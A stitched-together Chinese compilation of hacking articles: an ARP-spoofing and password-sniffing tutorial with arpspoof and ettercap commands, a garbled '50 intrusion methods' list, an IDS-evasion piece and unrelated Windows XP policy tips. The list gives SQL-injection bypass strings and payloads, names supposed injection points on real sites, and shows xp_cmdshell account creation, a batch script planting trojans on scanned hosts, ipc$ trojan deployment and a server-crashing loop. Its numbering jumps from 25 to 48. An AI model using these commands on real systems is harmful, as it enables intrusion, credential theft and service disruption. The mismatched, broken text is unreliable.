嗅探器(也称网络分析器)是种能够察看网络传输、将其解码并为网管提供可用的数据的一种软件。网管可以使用它提供的数据来诊断网络存在的问题。而恶意用户还会利用嗅探器来从网络上获取存储在文本中的密码。下面列举一些常用的专用嗅探器:NAI嗅探器(商用)、WIRESHARK(以前叫Ethereal,是一种Linux,Windows以及其他平台上使用的开发源码的图形用户界面的嗅探器)、 TCPDump(开放源码命令行嗅探器,在Unix类的操作系统上使用,如Linux或者FreeBSD),还有它的Windows版——Windump。
首先我们来说明一下一些网络基本知识。大多数的以太网都是一根总线的拓扑结构,使用同轴电缆或者双绞线和hub连通。网络上的所有节点(计算机和其他设备)都可以通过同样的线路通信,并且使用称为载波监听多路访问/冲突检测(CSMA/CD)的方案依次发送数据。你可以把CSMA/CD看作是在一个很吵闹的宴会中的两人对话,你需要等一会儿,等别人说话的间歇才有机会发言。网络上的所有节点都有自己唯一的MAC(媒体访问控制)地址,他们使用该地址互相发送信息包。通常,节点只会关注目的地是自己的MAC地址的那些信息包。但是如果网卡被设置成混杂模式的话,那它就会察看它连接的线路上的所有数据包。
为了减少冲突数量、降低嗅探不属于某节点的数据的可能性,大多数网络都使用了交换机。在网络中,hub是种无源设备,它会将接收到的所有传输发送到它的所有端口。而交换机则察看它所连接的所有节点的MAC地址以及所在端口,然后把那些数据包只发给它的目标节点。交换机大大降低了网路中的冲突数量,增大了网络的吞吐量。理论上,使用交换机的网络中,每个节点只能收到广播消息(发给局域网上所有计算机的消息)以及专门发送给它的MAC地址的数据包,还有偶尔出现的不知道目标地址的数据包。但是即使在局域网中使用交换机,它还是有可能被人使用某些交换机上的镜像端口而嗅探(这些镜像端口本来是网管分析网络问题时使用的),嗅探者可以误导交换机使其将数据映射给所有端口或者使用一种称为ARP病毒的技术(后面会详细讲到)。
以上讲述的是以太网络的一些基本知识,而WiFi(801.11a/801.11b/801.11g/801.11n)则与之完全不同。无线局域网很像使用hub的以太局域网。局域网中所有计算机都能看到发送给别的计算机的数据,但通常他们可以设置成忽略这些信息。(事实上,比这复杂,但是我篇幅有限,就不详细讲那错综复杂的80.211网络了)。但如果网卡是设置成混杂模式的话,那么它就不会忽略发送给其他计算机的数据,而是会察看这些数据,允许使用嗅探器的用户看到附在同一访问点的发送给其他用户的数据。混杂模式在Windows和Linux (或者其他类似Unix的操作系统)的有线网卡上运行得很有效,但是并不是所有的无线网卡都能很好地支持该模式(比如Intel的叫做IPW2200的 Centrino 802.11g芯片)。如果嗅探器的网卡不支持混杂模式,那么嗅探者就得把它附到无线网络的WAP(无线接入点)上才能看到其他数据。如果攻击者使用的是 Linux(或者类似Unix的操作系统),如果网卡支持的话,它可能可以使用监听模式。在监听模式下,无线网卡直接监听无线电波中的原始信息包而无需WAP的辅助。从攻击者角度看,监听模式的好处是:由于不需要WAP,他们的活动不会留下任何痕迹,也不用在网络上发送数据包。
由于WiFi网络使用的安全协议各有不同,因此嗅探WiFi网络变得更加复杂。如果你的网卡支持混杂模式并且你能使用WEP(也就是说你知道WEP密钥)连接到无线网络,你就可以嗅探几乎所有你想要获得的信息。如果网络使用的是WPA,就没那么容易了,因为即使你知道密码,你也不一定能解码那些你没有参与的网络对话中的所有数据。但是,你却有可能进行ARP病毒攻击或者使用其它的MitM(有人参与其中)攻击,从而获得数据路由。
网管们应当注意嗅探器的很多合法用途。网管可以用它们找出网络上出问题的计算机,比如占用太多带宽,网络设置错误或者正在运行恶意软件等等。我觉得它们在找出黑客攻击方面非常有用,我可以用它们嗅探自己的服务器找出那些不正常的传输。学会用嗅探器来找出网络的问题的话,每个系统管理员都能很好地完成自己的工作,我推荐你们使用Wireshark,因为它是免费的、跨平台的并且能够找到大量的相关资料(可以从本文结尾的链接中找到更多信息)。
那些想要绕过安全措施的人也可以用嗅探器。很多流行的应用协议把登陆凭证(用户名和密码)以纯文本的形式传递或者使用加密性差的形式传送。这些不安全的协议包括FTP、Telnet、POP3、SMTP还有HTTP基本验证。这种情况下应尽量使用替代它们的SFTP,SSH(安全保护套件),以及 HTTPS(SSL)。也许你很难从FTP协议切换到别的协议,因为使用像SFTP这样更安全的协议的客户端并不一定总是有。较新版本的Windows(命令行的ftp.exe以及图形用户界面形式的浏览器)都支持FTP客户端,但是你也可以下载支持SFTP的FileZilla和PSFTP的免费客户端。有些嗅探器拥有很强的提取密码的能力,比如Cain,Dsniff以及Ettercap。这三个都是免费或者开放源码的。Cain只支持Windows而Dsniff和Ettercap通常在Unix环境中运行,但也有相应的Windows版本。
ARP欺骗/ARP病毒
ARP是指地址解析协议,它允许网络将IP地址解析成MAC地址。基本上,ARP是这样工作的:当某个使用局域网IP的主机想要与另一台主机联络的时候,它需要那台主机的MAC地址。首先,它会查询自己的ARP缓存(想要查看你的ARP缓存,在命令行中输入ARP),看看是否已经知道那台主机的MAC 地址,如果没有,它会发出广播ARP请求,询问谁拥有我正在找的主机的IP地址? 如果拥有该地址的主机收到该ARP请求,它就会用自己的MAC地址响应,于是两台主机就可以使用IP进行对话了。通常,在像以太网这样使用Hub或者 801.11b标准的总线网络中,所有NICS(网络接口卡)为混杂模式的主机都能收到所有的传输,但是在使用交换机的网络中却有所不同。交换机会查看发送给它的数据,并只把数据包传给它的目标MAC地址所属主机。使用交换机的网络更安全一些并且能够提高网速,因为它只把数据包发给需要去的地方。但是仍然有突破这种网络的方法。使用Arpspoof(Dsniff的部分功能),Ettercap或者Cain我们就可以欺骗局域网中的其他主机,告诉它们,我们就是它们要找的那个主机,把它们传输通过我们来转发。
即使是使用交换机的网络,攻击者也可以很容易地从恢复启动CD中使用 Dsniff或者Ettercap,来进行ARP欺骗并将传输转为通过它们来进行。这些工具甚至能够自动解析出用户名和密码,这给使用者提供极大的便利。如果攻击者在网关和FTP服务器之间进行ARP欺骗,那么它就能嗅探传输并在用户试图从站点外获取数据的时候提取用户名和密码,使用SMTP和POP3也是一样。即使是用SFTP、SSL以及SSH,仍然可以用Ettercap嗅探密码,因为该工具可以代理那些类型的连接。用户可能会收到警告说,他们试图获得的服务器的公共密钥已经被修改,或者可能不合法,但是我们中有多少人只是将那些信息关闭而根本不读呢
图1中的图片说明了ARP欺骗/ARP病毒如何工作的。基本上,攻击者跟Alan的电脑说,他就是Brain的电脑,反之亦然。这样,攻击者把Alan和Brain之间的网络传输全部接收过来了。一旦攻击者在两个节点之间进行了ARP欺骗,他就可以用任何他喜欢的工具进行嗅探(TCPDump、Wireshark、Ngrep等等)。在网关和电脑之间进行ARP欺骗的话,攻击者可以看到电脑正在发送和从网上接收的所有数据。本文中我只会讲到如何使用这些工具。
使用Dsniff和Ettercap快速演示ARP欺骗
让我们从dug Song的、支持Dsniff的ARPspoof程序开始吧。我使用的Unix版本,但是你可以找到Win32版本的。运行Dsniff最简单的方法就是从恢复启动CD启动。首先你应该确定包转发已经开启,不然我们的机器会丢弃所有我们想要嗅探的主机之间的传输,导致服务无响应。我用的一些工具会自动进行这项工作(比如Ettercap),但是保险起见,你也许会希望自己来做这件事。根据操作系统的不同,你可以使用如下的命令:
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
BSD:
sysctl -w net.inet.ip.forwarding=1
现在你的计算机将把转发所有的传输,现在你可以开始ARP欺骗了。我们假设你想要嗅探一个主机和网关之间的所有传输,这样你就可以看到它发送到网络上的所有数据。如果想要获得双向的所有传输,你应当使用如下2个命令行:
arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null
“& >/dev/nul”部分是为了使它在终端运行起来更容易,但是为了debug,你可能想要忽略它。现在你可以使用你想要的任何套件来嗅探连接。新手的话,我推荐使用Dsniff,它支持ARPspoof来嗅探纯文本密码。用Dsniff开始嗅探,你只需退出到命令窗口并输入:
dsniff
Dsniff找到用户名和密码后,它会将它们显示在屏幕上。如果你想要查看所有其他传输,我推荐你使用TCPDump或者 Wireshark。如果想要停止ARP欺骗,输入如下命令:
killall arpspoof
这会关闭上面启动的2个Arpspoof。
另一个很棒的工具是Ettercap,它相当于ARP病毒和密码嗅探界的瑞士军刀。我通常在非互动模式中使用它,但是默认情况下它的交互界面非常友好,使用起来很方便。如果你想要使用Ettercap来进行ARP病毒,你可以使用下面示范的命令例句。如果我们的目标是网络上的所有主机,想要嗅探每个节点之间的所有传输,我们可以用下列命令:
ettercap -T -q -M ARP // //
你应当谨慎的使用上面那段命令,因为如果把一个大网络中所有的传输都通过一台很慢的计算机的话,那么这很有可能使整个网络连接瘫痪。
我们可以找个替罪羊,来看看Ip地址为192.168.1.1的主机,我们可以使用如下命令:
ettercap -T -q -M ARP /192.168.1.1/ //
如果192.168.1.1是网关,我们应该可以看到所有的输出传输。下面是这些命令行选项的功能:
-T 告诉Ettercap使用文字界面,我最喜欢这个选项,因为GUI模式太复杂了。
-q 让Ettercap安静些,换句话说就是少些冗长的文字报告。
-M 让Ettercap我们想要使用的MITM(人参与其中)方式,本例中是ARP病毒。
其他工具
我还想说很多其他的工具。首先就是Cain,这个Windows用户会觉得很好用。总之,它功能强大,操作简单。
如果你喜欢漂亮的图形界面,Cain就是你很好的选择之一。它不像Ettercap那么多选项,但是很酷也有很多Windows附加功能。
还有为了查看特定内容的专门的嗅探器。Driftnet能够分析出人们上网看到的图片。
这些也是嗅探器比如P0f,它让你被动得知网络传输的操作系统。
以上说的只是众多专门的嗅探器中的一小部分,仅仅是冰山的一角。
减轻嗅探攻击的危害
人们可以使用不少方法来缓解嗅探攻击的危害:
1.不使用像HTTp验证以及Telnet这些不安全的协议。事实上,你应当嗅探自己的网络,看看这些工具都列出了哪些能提取的密码。
2.如果你不得不使用不安全的协议,那你最好能把敏感信息加密后再传送出去。
3.察看临界工作站和服务器之间的静态ARP表。这种方法不易维持,但是可以限制arp欺骗。
4.运行ARPWatch等软件来检测你的网络物理地址,看看它是不是变成指向嗅探器的了。
5.运行Sniffdet和Sentinel来检测网卡是否出于混杂模式,是否运行了嗅探软件。
6.让从外部进入你的设备的、使用Wi-Fi的笔记本使用VPN来连接到网络。
7.锁住工作站,这样用户就无法安装嗅探软件或者像KNOPPIX那样从CD运行嗅探软件。
8.把员工工作站和服务器与公共终端隔离到不同的局域网中。
希望这篇文章能给你提供些许帮助。
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%’and 1=1 and ’%’=’
关键字%’and 1=2 and ’%’=’
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是
4.我们先到www.google.com底下搜索一下co net mib ver 1.0
密码帐号都是 ’or’=’or’
5.挂马代码
6.http://www.wyyfk.com/24小时挂qq工具
7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出guest是管理员来
7.只要敢想,新浪也可入侵 注入点
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59
微软官方网站注入点
http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=
8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马
9.有SA权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
sql注入后,如何上传木马,
文章地址 http://hack123.home4u.china.com/0601.htm
10.qq强制聊天代码
http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。
11. mybbs论坛cookie欺骗 后台备份马
12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等
用法: 安装: instsrv.exe 服务名称 路径
卸载: instsrv.exe 服务名称 remove
13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陆密码
14.搜索的技巧 inurl:网址
15.启航工作室wms 5.0网站程序漏洞
在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)
利用动画看http://soft.77169.com/62/20050530/6824.html
16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以木马不会变~
17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/
工具下载www.hack6.com
地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面
18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了
工具使用方法动画和所有文件
http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811
20.缺少xp_cmdshell时
尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate ’wscript.shell’,@o out
exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理员
21.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头
22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com
23.dv7.1用还原数据功能 还原asa木马
24.凡人网络购物系统v6.0 可以%5c暴库
25.ipb2.0.2漏洞 构造语句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb c:\sql
echo tsenable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为bat文件,上传至肉鸡,执行。
(2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
下载地址:www.netsill.com/rots.zip
在命令行方式下使用windows自带的脚本宿主程序CScript.exe调用脚本,例如:
c:\>cscript rots.vbs [服务端口] [/r]
如果要对本地使用,ip地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。
(3)djshao正式版5.0
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下,然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡 会自动重启!重启后会出现终端服务
(4)下载DameWare NT Utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方ip用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后ok
(5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可
48.qq上得到别人的ip
一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大
当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复
还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip
49.挂马js代码document.write(’’);保存到js页面里 可让所有页面挂马
50.让服务器重启
写个bat死循环:
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
要想有效的防范黑客对我们电脑的入侵和破坏,仅仅被动的安装防火墙是显然不够的,我们更应该了解一些常见的黑客入侵手法,针对不同的方法采取不同的措施,做到有的放矢。
1、木马入侵
木马也许是广大电脑爱好者最深恶痛绝的东东了,相信不少朋友都受到过它的骚扰。木马有可能是黑客在已经获取我们操作系统可写权限的前提下,由黑客上传的(例如下面会提到的ipc$共享入侵);也可能是我们浏览了一些垃圾个人站点而通过网页浏览感染的(利用了IE漏洞);当然,最多的情况还是我们防范意识不强,随便运行了别人发来的所谓的mm图片、好看的动画之类的程序或者是在不正规的网站上随便下载软件使用。
应对措施:提高防范意识,不要随意运行别人发来的软件。安装木马查杀软件,及时更新木马特征库。推荐使用the cleaner,木马克星。
2、ipc$共享入侵
微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下:
(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高,又很简单,是很容易被破解的。根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。
(2)使用命令net use \xxx.xxx.xxx.xxx\ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe \xxx.xxx.xxx.xxx\admin$Content$nbsp;将木马程序的服务器端复制到系统目录下。
(3)用net time \xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。
这样一来,你的电脑就完全被黑客控制了。
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1)。
当然,给自己的帐户加上强壮的口令才是最关键的。
3、IIS漏洞入侵
由于宽带越来越普及,给自己的win2000或是xp装上简单易学的iis,搭建一个不定时开放的ftp或是web站点,相信是不少电脑爱好者所向往的,而且应该也已经有很多人这样做了。但是iis层出不穷的漏洞实在令人担心。远程攻击着只要使用webdavx3这个漏洞攻击程序和telnet命令就可以完成一次对iis的远程攻击,成功后我们可以看到如图2的利用iis的webdav漏洞攻击成功后的界面。
这里的systen32就指的是对方机器的系统文件夹了,也就是说黑客此刻执行的任何命令,都是在被入侵的机器上运行的。这个时候如果执行format命令,危害就可想而知了,用net user命令添加帐户也是轻而易举的。
应对措施:关注微软官方站点,及时安装iis的漏洞补丁。
4、网页恶意代码入侵
在我们浏览网页的时候不可避免的会遇到一些不正规的网站,它们经常会擅自修改浏览者的注册表,其直接体现便是修改IE的默认主页,锁定注册表,修改鼠标右键菜单等等。实际上绝大部分的网页恶意代码都是通过修改我们的注册表达到目的。只要保护好自己的注册表,就一切ok了。
应对措施:安装具有注册表实时监控功能的防护软件,做好注册表的备份工作。禁用Remote Registry Service服务,不要上一些不该上的网站。这里我推荐大家使用hackereliminator这款防火墙。
【赛迪网-IT技术报道】黑客的聪明并不只是在于他们知道如何去入侵服务器,还在于他们知道如何去伪装自己的攻击。恶意的攻击者会使用多种逃避的手段来让自己不会被检测到,所以作为系统管理员,也应当了解这些手段以应付可能发生的攻击。
这篇文章的主要目的不是揭示黑客新的攻击手法,而是对那些黑客所用到的逃避检测的手法以及他们可能留下的证据做描述。这些手段的欺骗性很大,所以想检测到它们也更加的困难。
网络服务器
我们的实验环境使用两种最常用的网络服务器,Apache和微软的InternetInformationServer(IIS)。我们在RedHatLinux上运行Apache1.3.9,在WindowsNT4.0上运行IIS4.0。并且两种都采用普通和允许SSL的版本,所以我们可以对加密和未加密的服务器的攻击做测试。
16进制编码
一种最简单的将攻击伪装的手段就是修改URL请求。作为管理员,我们一般会在日志文件中查找某些字符串,或是一些普通文本的字符集。例如我们在请求中查找匹配已知漏洞的字符串。例如,我们在我们的IIS服务器中发现了如下的字符串,我们就知道有人正在查找是否有IIS中可以远程利用的MDAC漏洞:06:45:2510.0.2.79GET/msadc/302
要知道攻击者是如何躲过这种匹配检测的,请参考以下作为恶意攻击者策略一部分的请求。要确定msadc目录是否存在,攻击者可能键入以下内容:
[root@localhost/root]#nc-n10.0.2.5580
GET/msadcHTTP/1.0
这就会产生我们以上所见的日志文件。攻击者可以将请求进行十六进制的ASCII字符编码。在以上的例子中,字符串msadc在十六进制编码以后就会变为6D73616463。你可以使用WindowsCharmap程序来快速的进行字符的ASCII到十六进制的转换。以上的HTTP请求,将字符串msadc用十六进制编码以后,就变成了:
[root@localhost]#nc-n10.0.2.5580
GET/%6D%73%61%64%63HTTP/1.0
IIS的日志文件显示:
07:10:3910.0.2.31GET/msadc/302
应当注意的是,虽然采用了十六进制编码的手段,但是所产生的日志和没有使用十六进制编码的URL产生的是一样的。所以在这个例子里,编码并没有帮助攻击者逃避检测。但是,如果我们看看看Apache的日志情况,那么就是另外一个情形了。以下列出了攻击者使用来搜索某个CGI脚本的命令,后面跟着的是使用十六进制编码以后的同样命令:
[root@localhost]#nc-n10.0.0.280
HEAD/cgi-bin/test-cgiHTTP/1.0
[root@localhost]#nc-n10.0.0.280
HEAD/%63%67%69-bin/test-%63%67%69HTTP/1.0
现在我们来查看一下access_log文件:
10.10.10.10--[18/Oct/2000:08:22:47-0700]"HEAD/cgi-bin/test-cgiHTTP/1.0"2000
10.10.10.10--[18/Oct/2000:08:23:47-0700]"HEAD/%63%67%69-bin/test-%63%67%69HTTP/1.0"2000
首先应注意到的是在这两个例子中都是200代码说明命令完成成功。但是在第二中情况中,日志中出现的是十六进制的值而不是明文的。如果我们是依赖于形式来对这种攻击进行检测的话,那么我们是不可能检测到所发生的攻击的。许多的入侵检测系统使用的格式匹配技术智能化都不高,并且有些产品不会将十六进制的URL转换过后进行匹配。但是不论所使用的入侵检测软件是否能够对十六进制的代码进行转换,所有的网络管理员都应当对这种伎俩有所了解。
代理服务器
因为对攻击者而言完全隐藏攻击行为是很难做到的,所以掩盖攻击的真实来源也就成为相当重要的课题了。如果黑客可以隐藏他的源IP地址的话,那么他就可以在不用担心被抓住的情况下进行攻击。而黑客用来隐藏他们的源IP地址的一种手段就是使用代理服务器。
代理服务器是被合法的用来从一个单一的访问点转发多种协议的。一般来说,内部用户必须通过代理服务器才能访问Internet,因此管理员就可以在代理服务器指定外部访问以及内部访问的限制策略。用户首先是和代理服务器建立连接,然后代理服务器就将连接请求转发到真正的目的地址。目的地址会记录下代理服务器的IP地址以作为请求的源地址,而不是最初发出请求的系统的IP地址。
但是不幸的是代理服务器在Internet上的放置太随意了。(可以查看Proxys-4-All来获得这些错误配置机器的列表。)这些服务器经常会存在配置错误使得Internet用户可以连接到这些代理服务器上。一旦某个Internet用户通过代理服务器连接到某个服务器上,该服务器就会将代理服务器的IP地址作为发出请求的源地址记录在日志中。而在被攻击服务器的日志中对攻击者的记录其IP地址是属于一个没有任何攻击行为的“无辜”主机的,而不是攻击者的真正地址。我们来看以下的例子。
下面的例子显示了黑客的攻击和攻击在日志中产生的相关信息。
攻击者
[root@10.1.1.1/]#nc-v10.8.8.880
HEAD/HTTP/1.0
日志文件
10.1.1.1--[18/Oct/2000:03:31:58-0700]"HEAD/HTTP/1.0"2000
在下面这种情况中,我们看到攻击者达到了同样的目的,但是这次他使用了代理服务器。
攻击者
[root@10.1.1.1/]#nc-v216.234.161.8380
HEAD
总结:
看了上面介绍,相信大家对黑客入侵手段也有所了解。也希望能对大家有所帮助。如果您有更好的方法或是建议请来信告诉我们,感谢您的支持!dongjw#staff.ccidnet.com (请将"#"改为"@")
这里将向你揭示黑客入侵Windows XP操作系统常用的七种方法。
第一招、屏幕保护
在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。
提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。
不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。
此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。
第二招、巧妙隐藏硬盘
在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。
原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择“显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。
接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。
如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”。
将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到“(file://%TEMPLATEDIR%\wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d:\tupian\tupian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。
当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。
*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0
*usingthefile%THISDIRPATH%\folder.htt.
保存并退出,按“F5”键刷新一下,是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。
第三招、禁用“开始”菜单命令
在Windows2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行”对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动WindowsXP组策略编辑器。
在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。
在禁用“开始”菜单命令的时候,在右侧窗口中,提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体操作步骤为:
1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。
2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。
第四招、桌面相关选项的禁用
WindowsXP的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支,即可在右侧窗口中显示相应的策略选项。
1)隐藏桌面的系统图标
倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。
若要隐藏桌面上的“网上邻居”和“InternetEXPlorer”图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的InternetEXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目”启用即可。
当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后,“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站”策略项启用。
2)禁止对桌面的某些更改
如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。
第五招、禁止访问“控制面板”
如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。
此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始”菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。
提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个操作。
第六招、设置用户权限
当多人共用一台计算机时,在WindowsXP中设置用户权限,可以按照以下步骤进行:
1)运行组策略编辑器程序。
2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。
3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。
第七招、文件夹设置审核
WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:
1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。
2)在右侧窗口中用鼠标双击“审核对象访问”选项。
